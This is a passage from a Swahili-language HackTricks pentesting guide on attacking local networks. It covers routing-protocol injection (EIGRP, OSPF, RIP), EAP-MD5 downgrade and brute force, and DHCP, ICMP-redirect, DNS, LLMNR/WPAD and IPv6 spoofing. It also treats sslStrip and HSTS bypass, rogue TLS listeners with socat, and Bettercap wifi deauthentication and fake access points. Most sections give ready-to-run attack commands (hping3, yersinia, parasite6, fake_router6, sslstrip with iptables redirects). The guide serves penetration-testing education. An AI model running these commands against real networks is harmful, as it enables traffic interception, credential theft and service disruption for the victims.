- Kulazimisha uthibitishaji wa EAP-MD5 ili kuepuka uthibitishaji wa cheti la TLS
- Kuingiza trafiki ya network yenye madhara mara baada ya authentication kwa kutumia hub au kifaa kinachofanana
Ikiwa mshambuliaji yuko kati ya victim na authentication server, anaweza kujaribu kudhoofisha (ikiwa inahitajika) protocol ya authentication hadi EAP-MD5 na kukamata jaribio la authentication. Kisha, angeweza kufanya brute-force kwa kutumia:
eapmd5pass –r pcap.dump –w /usr/share/wordlist/sqlmap.txt
FHRP (GLBP & HSRP) Mashambulizi
FHRP (First Hop Redundancy Protocol) ni darasa la itifaki za mtandao zilizoundwa ili kuunda mfumo wa routing wa ziada unaofanya kazi papo hapo. Kwa FHRP, routers za kimwili zinaweza kuunganishwa kuwa kifaa kimoja cha kimantiki, ambacho huongeza uvumilivu wa hitilafu na husaidia kugawanya mzigo.
Cisco Systems engineers wameunda itifaki mbili za FHRP, GLBP na HSRP.
RIP
Matoleo matatu ya Routing Information Protocol (RIP) yanajulikana kuwepo: RIP, RIPv2, na RIPng. Datagramu zinatumwa kwa peers kupitia port 520 kwa kutumia UDP na RIP na RIPv2, wakati RIPng inapotuma datagramu hutumia UDP port 521 kwa kupitia IPv6 multicast. RIPv2 ilileta msaada wa uthibitishaji wa MD5. Kwa upande mwingine, RIPng haina uthibitishaji wa asili; badala yake inategemea vichwa vya hiari vya IPsec AH na ESP ndani ya IPv6.
- RIP and RIPv2: Mawasiliano hufanywa kupitia datagramu za UDP kwenye port 520.
- RIPng: Inatumia UDP port 521 kwa kutangaza datagramu kupitia IPv6 multicast.
Kumbuka kuwa RIPv2 inasaidia uthibitishaji wa MD5 wakati RIPng haina uthibitishaji wa asili, ikitegemea vichwa vya IPsec AH na ESP ndani ya IPv6.
EIGRP Mashambulizi
EIGRP (Enhanced Interior Gateway Routing Protocol) ni itifaki ya routing inayobadilika. Ni itifaki ya distance-vector. Ikiwa hakuna uthibitishaji na usanidi wa interfaces passive, muvamizi anaweza kuingilia routing ya EIGRP na kusababisha uchafuzi wa jedwali za routing. Zaidi ya hayo, mtandao wa EIGRP (kwa maneno mengine, autonomous system) ni usawa na haugawiki katika maeneo yoyote. Ikiwa mshambuliaji ataingiza route, kuna uwezekano route hiyo itaenea katika mfumo mzima wa autonomous EIGRP.
Kushambulia mfumo wa EIGRP kunahitaji kuanzisha ujirani na router halali wa EIGRP, jambo ambalo hufungua fursa nyingi, kutoka reconnaissance ya msingi hadi aina mbalimbali za injections.
FRRouting inakuwezesha kutekeleza virtual router inayounga mkono BGP, OSPF, EIGRP, RIP na itifaki nyingine. Yote unayotakiwa kufanya ni kuitegemea kwenye mfumo wa mshambuliaji na unaweza kujionyesha kama router halali katika eneo la routing.
Coly ina uwezo wa kukamata matangazo ya EIGRP (Enhanced Interior Gateway Routing Protocol). Pia inawezesha injection ya packets, ambazo zinaweza kutumika kubadilisha usanidi wa routing.
OSPF
Katika itifaki ya Open Shortest Path First (OSPF), uthibitishaji wa MD5 mara nyingi hutumika kuhakikisha mawasiliano salama kati ya routers. Hata hivyo, hatua hii ya usalama inaweza kuvurugwa kwa kutumia zana kama Loki na John the Ripper. Zana hizi zina uwezo wa kukamata na kuvunja MD5 hashes, zikifichua ufunguo wa uthibitishaji. Mara ufunguo huo unapopatikana, unaweza kutumika kuingiza taarifa mpya za routing. Ili kusanidi vigezo vya route na kuweka ufunguo uliovamiwa, tabo za Injection na Connection zinatumiwa kwa mtiririko huo.
- Kukamata na Kuvunja MD5 Hashes: Zana kama Loki na John the Ripper zinatumika kwa madhumuni haya.
- Kusanidi Vigezo vya Route: Hufanywa kupitia tabo ya Injection.
- Kuweka Ufunguo Uliovamiwa: Ufunguo unasanidiwa chini ya tabo ya Connection.
Other Generic Tools & Sources
- Above: Zana ya kuchambua trafiki ya mtandao na kubaini udhaifu
- Unaweza kupata taarifa zaidi kuhusu mashambulizi ya mtandao here.
Spoofing
Mshambuliaji anasanidi vigezo vyote vya mtandao (GW, IP, DNS) vya mwanachama mpya wa mtandao kwa kutuma DHCP responses za bandia.
Ettercap
yersinia dhcp -attack 2 #More parameters are needed
ARP Spoofing
Angalia previous section.
ICMPRedirect
ICMP Redirect inajumuisha kutuma ICMP packet type 1 code 5 kinachoonyesha kwamba attacker ndiye njia bora ya kufikia IP. Kisha, wakati victim atakapotaka kuwasiliana na IP, atatuma packet kupitia attacker.
Ettercap
icmp_redirect
hping3 [VICTIM IP ADDRESS] -C 5 -K 1 -a [VICTIM DEFAULT GW IP ADDRESS] --icmp-gw [ATTACKER IP ADDRESS] --icmp-ipdst [DST IP ADDRESS] --icmp-ipsrc [VICTIM IP ADDRESS] #Send icmp to [1] form [2], route to [3] packets sent to [4] from [5]
DNS Spoofing
Mshambuliaji atatatua baadhi (au yote) ya vikoa ambavyo mhanga anaomba.
set dns.spoof.hosts ./dns.spoof.hosts; dns.spoof on
Sanidi DNS yako mwenyewe na dnsmasq
apt-get install dnsmasqecho "addn-hosts=dnsmasq.hosts" > dnsmasq.conf #Create dnsmasq.confecho "127.0.0.1 domain.example.com" > dnsmasq.hosts #Domains in dnsmasq.hosts will be the domains resolved by the Dsudo dnsmasq -C dnsmasq.conf --no-daemon
dig @localhost domain.example.com # Test the configured DNS
Milango ya ndani
Mara nyingi kuna njia nyingi za kufikia mifumo na mitandao. Baada ya kuunda orodha ya anwani za MAC ndani ya mtandao wa ndani, tumia gateway-finder.py kutambua hosts zinazounga mkono IPv4 forwarding.
root@kali:~# git clone https://github.com/pentestmonkey/gateway-finder.git
root@kali:~# cd gateway-finder/
root@kali:~# arp-scan -l | tee hosts.txt
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.6 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
10.0.0.100 00:13:72:09:ad:76 Dell Inc.
10.0.0.200 00:90:27:43:c0:57 INTEL CORPORATION
10.0.0.254 00:08:74:c0:40:ce Dell Computer Corp.
root@kali:~/gateway-finder# ./gateway-finder.py -f hosts.txt -i 209.85.227.99
gateway-finder v1.0 http://pentestmonkey.net/tools/gateway-finder
[+] Using interface eth0 (-I to change)
[+] Found 3 MAC addresses in hosts.txt
[+] We can ping 209.85.227.99 via 00:13:72:09:AD:76 [10.0.0.100]
[+] We can reach TCP port 80 on 209.85.227.99 via 00:13:72:09:AD:76 [10.0.0.100]
Spoofing LLMNR, NBT-NS, and mDNS
Kwa utekelezaji wa kutatua majina ya hosti ya ndani pale utafutaji wa DNS unaposhindwa, mifumo ya Microsoft inategemea Link-Local Multicast Name Resolution (LLMNR) na NetBIOS Name Service (NBT-NS). Vilevile, Apple Bonjour na Linux zero-configuration implementations hutumia Multicast DNS (mDNS) kugundua systems ndani ya mtandao. Kutokana na asili isiyothibitishwa ya protokoli hizi na jinsi zinavyofanya kazi juu ya UDP kwa kutuma matangazo, zinaweza kutumiwa na attackers wanaolenga kuwalenga watumiaji na kuwarekebisha kwa huduma zenye madhara.
Unaweza kuiga services zinazotafutwa na hosts kwa kutumia Responder kutuma majibu ya uongo.
Soma hapa habari zaidi kuhusu how to Impersonate services with Responder.
Spoofing WPAD
Browsers kawaida hutumia the Web Proxy Auto-Discovery (WPAD) protocol ili kupata mipangilio ya proxy kwa otomatiki. Hii inajumuisha kupata maelezo ya konfigurasheni kutoka kwa server, hasa kupitia URL kama "http://wpad.example.org/wpad.dat". Ugundaji wa server hii na clients unaweza kutokea kwa njia mbalimbali:
- Kupitia DHCP, ambapo ugundaji hufanywa kwa kutumia entry maalum ya code 252.
- Kwa DNS, ambayo inahusisha kutafuta hostname iliyo alama wpad ndani ya domain ya ndani.
- Kupitia Microsoft LLMNR and NBT-NS, ambazo ni mbinu za fallback zinazotumika pale utafutaji wa DNS haufaniki.
Zana Responder inachukua faida ya protocol hii kwa kufanya kazi kama server ya WPAD yenye nia mbaya. Inatumia DHCP, DNS, LLMNR, na NBT-NS kudanganya clients ili waiunge nazo. Ili kujifunza kwa undani jinsi services zinavyoweza kuigwa kwa kutumia Responder check this.
Spoofing SSDP and UPnP devices
Unaweza kutoa services mbalimbali ndani ya mtandao kujaribu kudanganya mtumiaji kuingiza baadhi ya nywila za maandishi wazi. More information about this attack in Spoofing SSDP and UPnP Devices.
IPv6 Neighbor Spoofing
Shambulio hili ni karibu sawa na ARP Spoofing lakini katika ulimwengu wa IPv6. Unaweza kufanya madhulumiwa afikiri kuwa IPv6 ya GW ina MAC ya mshambuliaji.
sudo parasite6 -l eth0 # This option will respond to every requests spoofing the address that was requested
sudo fake_advertise6 -r -w 2 eth0 <Router_IPv6> #This option will send the Neighbor Advertisement packet every 2 seconds
IPv6 Router Advertisement Spoofing/Flooding
Baadhi ya OS huweka kwa chaguo-msingi gateway kutoka kwa vifurushi vya RA vinavyotumwa kwenye mtandao. Ili kutangaza mshambuliaji kama IPv6 router unaweza kutumia:
sysctl -w net.ipv6.conf.all.forwarding=1 4
ip route add default via <ROUTER_IPv6> dev wlan0
fake_router6 wlan0 fe80::01/16
IPv6 DHCP spoofing
Kwa chaguo-msingi baadhi ya OS hujaribu kusanidi DNS kwa kusoma paketi ya DHCPv6 kwenye mtandao. Mshambuliaji anaweza kutuma paketi ya DHCPv6 ili kujifanya kuwa DNS. DHCP pia hutoa anwani ya IPv6 kwa muathiriwa.
dhcp6.spoof on
dhcp6.spoof.domains <list of domains>
mitm6
HTTP (ukurasa bandia na JS code injection)
Shambulio za Intaneti
sslStrip
Kwa kawaida, shambulio hili hufanya ni kwamba, ikiwa user anajaribu access ukurasa wa HTTP unao redirecting kwa toleo la HTTPS, sslStrip itafanya maintain HTTP connection with client na HTTPS connection with server, hivyo itakuwa na uwezo wa sniff muunganisho kwa plain text.
apt-get install sslstrip
sslstrip -w /tmp/sslstrip.log --all - l 10000 -f -k
#iptables --flush
#iptables --flush -t nat
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
iptables -A INPUT -p tcp --destination-port 10000 -j ACCEPT
Maelezo zaidi hapa.
sslStrip+ and dns2proxy kwa kuvuka HSTS
Tofauti kati ya sslStrip+ and dns2proxy dhidi ya sslStrip ni kwamba zitafanya redirect, kwa mfano www.facebook.com kuwa wwww.facebook.com (kumbuka "w" ya ziada) na zitapanga anwani ya domain hii kuwa IP ya attacker. Kwa njia hii, client itaconnect kwa wwww.facebook.com (the attacker) lakini nyuma ya pazia sslStrip+ itadumisha real connection kupitia https na www.facebook.com.
Lengo la mbinu hii ni kuepuka HSTS kwa sababu wwww.facebook.com haitahifadhiwa katika cache ya browser, hivyo browser itadanganywa kufanya facebook authentication in HTTP.
Tambua kwamba ili kutekeleza attack hii victim anapaswa kujaribu kufikia kwanza http://www.faceook.com na sio https. Hii inaweza kufanywa kwa kubadilisha links ndani ya ukurasa wa http.
Taarifa zaidi hapa, hapa na hapa.
sslStrip or sslStrip+ haisaidi tena. Hii ni kwa sababu kuna HSTS rules zilizohifadhiwa awali kwenye browsers, hivyo hata kama ni mara ya kwanza mtumiaji anapofikia domain "important" ataifikia kupitia HTTPS. Pia, zingatia kwamba rules zilizohifadhiwa awali na rules zingine zinazotengenezwa zinaweza kutumia flag includeSubdomains hivyo mfano wa wwww.facebook.com uliotajwa hapo awali hautafanya kazi tena kwa kuwa facebook.com inatumia HSTS na includeSubdomains.
TODO: easy-creds, evilgrade, metasploit, factory
TCP kusikiliza kwenye port
sudo nc -l -p 80
socat TCP4-LISTEN:80,fork,reuseaddr -
TCP + SSL sikiliza kwenye port
Tengeneza funguo na cheti kilichojisainiwa
FILENAME=server
# Generate a public/private key pair:
openssl genrsa -out $FILENAME.key 1024
# Generate a self signed certificate:
openssl req -new -key $FILENAME.key -x509 -sha256 -days 3653 -out $FILENAME.crt
# Generate the PEM file by just appending the key and certificate files:
cat $FILENAME.key $FILENAME.crt >$FILENAME.pem
Sikiliza kwa kutumia cheti
sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0 -
Sikiliza kwa kutumia cheti na uelekeze kwa hosts
sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0 openssl-connect:[SERVER]:[PORT],verify=0
Wakati mwingine, ikiwa mteja anathibitisha kwamba CA ni halali, unaweza serve a certificate of other hostname signed by a CA.
Jaribio jingine la kuvutia ni kumtumia certificate of the requested hostname but self-signed.
Mambo mengine ya kujaribu ni kujaribu kusaini certificate kwa kutumia certificate halali ambayo si CA halali. Au kutumia valid public key, kulazimisha kutumia algorithm kama diffie hellman (ile ambayo haitaji ku-decrypt chochote kwa private key halisi) na wakati client inapoomba probe ya private key halisi (kama hash) tuma probe ya uongo na kutarajia kwamba client haitachunguza hili.
Bettercap
# Events
events.stream off #Stop showing events
events.show #Show all events
events.show 5 #Show latests 5 events
events.clear
# Ticker (loop of commands)
set ticker.period 5; set ticker.commands "wifi.deauth DE:AD:BE:EF:DE:AD"; ticker on
# Caplets
caplets.show
caplets.update
# Wifi
wifi.recon on
wifi.deauth BSSID
wifi.show
# Fake wifi
set wifi.ap.ssid Banana
set wifi.ap.bssid DE:AD:BE:EF:DE:AD
set wifi.ap.channel 5
set wifi.ap.encryption false #If true, WPA2
wifi.recon on; wifi.ap
Vidokezo vya Ugunduzi wa Moja kwa Moja
Kumbuka kwamba wakati paketi ya UDP inapotumwa kwa kifaa ambacho hakina port iliyohitajika, ICMP (Port Unreachable) inatumwa.
ARP ugundaji
Paketi za ARP zinatumika kugundua IPs zinazotumika ndani ya mtandao. PC inapaswa kutuma ombi kwa kila anwani ya IP inayowezekana na ni zile tu zinazotumiwa zitakazo jibu.
mDNS (multicast DNS)
Bettercap inatuma ombi la MDNS (kila X ms) likiuliza kwa _services_.dns-sd._udp.local. Mashine inayona paketi hii kawaida hupiga jibu kwa ombi hili. Kisha, inatafuta tu mashine zinazo jibu "services".
Zana
- Avahi-browser (--all)
- Bettercap (net.probe.mdns)
- Responder
NBNS (NetBios Name Server)
Bettercap inatuma paketi za broadcast kwa port 137/UDP ikiuomba jina "CKAAAAAAAAAAAAAAAAAAAAAAAAAAA".
SSDP (Simple Service Discovery Protocol)
Bettercap inatuma paketi za SSDP kwa broadcast ikitafuta aina zote za services (UDP Port 1900).
WSD (Web Service Discovery)
Bettercap inatuma paketi za WSD kwa broadcast ikitafuta services (UDP Port 3702).
Telecom / Mobile-Core (GTP) Exploitation
Marejeo
- https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9
- Network Security Assessment: Know Your Network (3rd edition)
- Practical IoT Hacking: The Definitive Guide to Attacking the Internet of Things. By Fotios Chantzis, Ioannis Stais, Paulino Calderon, Evangelos Deirmentzoglou, Beau Wood
- https://medium.com/@cursedpkt/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.